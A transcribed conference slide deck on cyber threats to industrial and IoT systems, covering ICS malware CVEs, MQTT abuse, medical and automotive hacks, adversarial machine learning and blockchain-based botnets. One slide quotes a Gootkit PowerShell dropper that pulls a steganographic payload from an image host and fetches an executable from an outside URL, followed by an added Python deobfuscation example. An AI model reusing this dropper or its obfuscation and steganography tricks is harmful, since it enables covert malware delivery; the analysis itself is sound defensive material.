Post on 14-Jul-2020


Cyber Threats in Industry 4.0

Presented by Antonio Pirozzi


Agenda

• The Cyberspace

• Industry 4.0

• Scenarios

• IoT

• The evolution of Cyber Threats: AI

• Adversarial blockchain

• Recommendations


The Cyberspace

Nowadays, we live and work in a huge virtual space that makes the concept of frontier disappear. It takes the name of Cyberspace and is inevitably linked to the real-life domain, with which it establishes strong cause-effect relationships.


Industry 4.0 Cyber Physical Systems

The 9 enabling technologies defined by Boston Consulting are:

• Advanced manufacturing solution

• Additive manufacturing

• Augmented reality

• Simulation

• Horizontal and vertical integration

• Industrial internet

• Cloud

• Cyber-security

• Big Data Analytics (Analytics and Predictive Analytics)


Scenarios


Critical Infrastructure Cyber Threats

• Duqu2 uses a kernel mode exploit for CVE-2015-2360 to load its kernel mode component.

• Turla uses 2 exploits for CVE-2013-5065 and CVE-2013-3346

• Stuxnet uses 4 exploits for CVE-2010-2568, CVE-2010-2729, CVE-2008-4250, CVE-2010-2722 (American-Israeli Cyber Weapon)

• BlackEnergy uses a memory corruption vulnerability CVE-2014-1761 and an RCE vulnerability CVE-2014-4114

Siemens S7-300 (spin between 807 Hz and 1210 Hz)

From “The State of Industrial Cybersecurity 2017” report by Kaspersky


| Malware | CVE |
|---|---|
| Stuxnet | CVE-2010-2729, CVE-2010-2568, CVE-2008-4250 |
| Triton | N/A |
| Industroyer | CVE-2015-5374 |
| Havex (RAT) | CVE-2014-1761, CVE-2013-5671, CVE-2013-1756 |
| IronGate | N/A |
| BlackEnergy | CVE-2014-4114, CVE-2014-0751 |


Abusing the MQTT protocols

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

From: The Fragility of Industrial IoT’s Data Backbone, TrendMicro Research


M2M Technologies

M2M Technologies could be abused for:

• target reconnaissance

• industrial espionage

• targeted attacks

• lateral movements

From: The Fragility of Industrial IoT’s Data Backbone, TrendMicro Research


Biomedical Devices

[1] Radcliffe, Jerome. "Hacking medical devices for fun and insulin: Breaking the human SCADA system." Black Hat US 2011

[2] Bonaci, Tamara, et al. "To make a robot secure: an experimental analysis of cyber security threats against teleoperated surgical robots." arXiv preprint arXiv:1504.04339 (2015).

R7-2016-07.1: Communications transmitted in cleartext (CVE-2016-5084)

R7-2016-07.2: Weak pairing between remote and pump (CVE-2016-5085)

R7-2016-07.3: Lack of replay attack prevention or transmission assurance (CVE-2016-5086)


Automotive Threats

Charlie Miller and Chris Valasek originally hacked a Jeep Cherokee in 2015


IoT Botnets

• Linux.Aidra

• Bashlite

• Mirai

• Linux/IRCTelnet


Key Points

• Embedded devices are easily exploited (e.g., default credentials, exposed services)

• Off-the-shelf products with low security standards (often root:root and admin:admin, since few end users change these defaults once deployed)

• Malware can easily change default passwords

• Devices are rarely monitored and poorly maintained

• Low cost of entry for attackers, as control of thousands of devices can occur for nearly zero cost


Gootkit dropper evasion: LSB Steganography

sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("https://i.imgur.com/FNo9S33.png")); $o=a Byte[] 500;(0..0)|%{foreach($x in(0..499)){$p=$g.GetPixel($x,$_);$o[$_*500+$x]=([math]::Floor(($p.B-band 15)*16)-bor($p.G -band 15))}};[System.Text.Encoding]::ASCII.GetString($o[0..44])

${A`Az}=&("{5}{2}{3}{1}{4}{0}"-f'uageList','n','WinUs','erLa','g','Get-') |
&("{0}{1}{3}{2}" -f'O','ut-St','ing','r') -Stream;
if (${A`Az} -Match "ita"){${ur`Ls}=("{5}{4}{1}{2}{0}{3}"-f'/usbte','t','amo.us','ch','://ali','https'),"";
foreach(${u`RL} in ${UR`lS}){Try{.("{2}{0}{1}"-f '-H','ost','write') ${U`RL};
${FP} = "$env:temp\Defrags.exe";
&("{1}{3}{2}{0}"-f 'st','W','te-Ho','ri') ${fP};
${WC} = &("{2}{3}{0}{1}"-f '-Ob','ject','Ne','w') ("{2}{3}{0}{1}"-f'stem.Net.WebClie','nt','S','y');${wC};

Payload embedded with LSB steganography

PowerShell dropper

PowerShell payload obfuscated with string substitution

VT detection ratio: 0/57
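For analysts triaging a dropper obfuscated like the one on this slide, the following added example (not part of the original slides) statically resolves PowerShell format-operator ("-f") string substitution and normalises backtick-split variable names, without executing the script. The sample is constructed in the same style with a placeholder URL (c2.example.invalid), and all function names are hypothetical.

```python
import re

# "<template>" -f 'a','b',...  (PowerShell format operator used to hide strings)
FMT_EXPR = re.compile(
    r'''"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')''', re.IGNORECASE)
VAR_REF = re.compile(r"\$\{([^}]+)\}")        # ${na`Me} style variable references
CMDLET = re.compile(r"[A-Za-z]+-[A-Za-z]+")   # Verb-Noun shape of a cmdlet name


def resolve_format_strings(script):
    """Rebuild each format-operator string statically; nothing is executed."""
    resolved = []
    for template, arg_list in FMT_EXPR.findall(script):
        args = re.findall(r"'([^']*)'", arg_list)
        order = [int(i) for i in re.findall(r"\{(\d+)\}", template)]
        if max(order) >= len(args):   # truncated sample: skip rather than guess
            continue
        resolved.append("".join(args[i] for i in order))
    return resolved


def normalise_variable(name):
    # Assumption: the backticks precede ordinary letters, where PowerShell
    # ignores them; variable names are case-insensitive.
    return name.replace("`", "").lower()


def triage(script):
    """Group recovered strings into the categories an analyst reviews first."""
    strings = resolve_format_strings(script)
    return {
        "cmdlets": [s for s in strings if CMDLET.fullmatch(s)],
        "urls": [s for s in strings
                 if s.lower().startswith(("http://", "https://"))],
        "variables": sorted({normalise_variable(v)
                             for v in VAR_REF.findall(script)}),
    }


# Constructed sample in the style of the slide; the URL is a placeholder.
SAMPLE = r'''${A`Az}=&("{5}{2}{3}{1}{4}{0}"-f'uageList','n','WinUs','erLa','g','Get-') |
&("{0}{1}{3}{2}" -f'O','ut-St','ing','r') -Stream;
if (${A`Az} -Match "ita"){${ur`Ls}=("{3}{0}{2}{1}"-f'://c2.exam','lid/stage','ple.inva','https'),"";
foreach(${u`RL} in ${UR`lS}){${WC} = &("{2}{3}{0}{1}"-f '-Ob','ject','Ne','w') ("{2}{3}{0}{1}"-f'stem.Net.WebClie','nt','S','y')}}'''

if __name__ == "__main__":
    for key, values in triage(SAMPLE).items():
        print(f"{key}: {values}")
```

The recovered strings show the locale check (Get-WinUserLanguageList matched against "ita") and the WebClient construction that the substitution hides from signature-based scanning.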


Going Fileless: sLoad


The Cyber Security Shift

• Reactive Approaches

• Proactive Approaches

• Predictive Approaches (ML, AI)

“According to a Trend Micro study, an organization takes on average about 230 days to discover an intrusion.”


Deep Learning and ATM

Montepaschi defends their ATMs with deep learning

According to data from Ossif, the Anti-Crime Safety Research Center of the Italian Banking Association, the number of bank robberies in the last 15 years has gone from a level of 100 to 24, while attacks on ATMs have gone from 100 to 185.

Montepaschi is developing an ATM protection system that uses depth cameras (Intel RealSense) and a convolutional neural network (deep learning) to correlate the information coming from the sensors and thus prevent the phenomena before they occur.


AI versus AI

“This is the first year where we will see AI versus AI in a cybersecurity context,”

Nick Savvides, CTO at Symantec


All ML models have blind spots: adversarial examples can generalize across models

Practical Black-Box Attacks against Machine Learning

Nicolas Papernot, Patrick McDaniel, Ian Goodfellow, Somesh Jha, Z. Berkay Celik, Ananthram Swami

Goal: Can You Break Machine Learning?


Adversarial Machine Learning: Reinforcement Learning

Hyrum Anderson, Evading next-gen AV using A.I., DEFCON 25

Goal: Can You Break Machine Learning?


Neural level Trojan

Authors describe a technique for inserting trojan code into deep learning models.


The first known example of the use of ML for the creation of malware dates to 2017:

"Generating Adversarial Malware Examples for Black-Box Attacks Based on GAN" by Weiwei Hu, Ying Tan

MalGAN: bypass black-box machine learning based detection models


Hivenet

A “hivenet” is a self-learning cluster of compromised devices that share information and customize attacks. Hivenets direct swarmbots based on what they learn during an attack.


Adversarial Blockchain


BOTCHAIN

“BOTCHAIN is the ultimate Infrastructure to Build resilient BOTNETS upon the Blockchain”

• Tamper-proof communications: immune to data modifications.

• HA: nodes don’t have a hardcoded C2 address. C2 could be ANY WALLET

• Zero-data-leakage: no data can be gathered by reverse engineering the bots


DEMO


Blockchain Composition Malware

[Figure: The Disassembler; The Assembler]

Design of a blockchain-resident composition malware: a proof of concept. Visaggio, Pirozzi 2017


High level Recommendation

• Implement proper policies to remove unnecessary M2M services

• Run periodic checks using internet-wide scan services or tools to ensure that none of the sensitive company data is inadvertently leaked through public IoT services

• Implement a vulnerability management workflow or other means to secure the supply chain.

• Stay up to date with the standards in this space because this technology is evolving rapidly.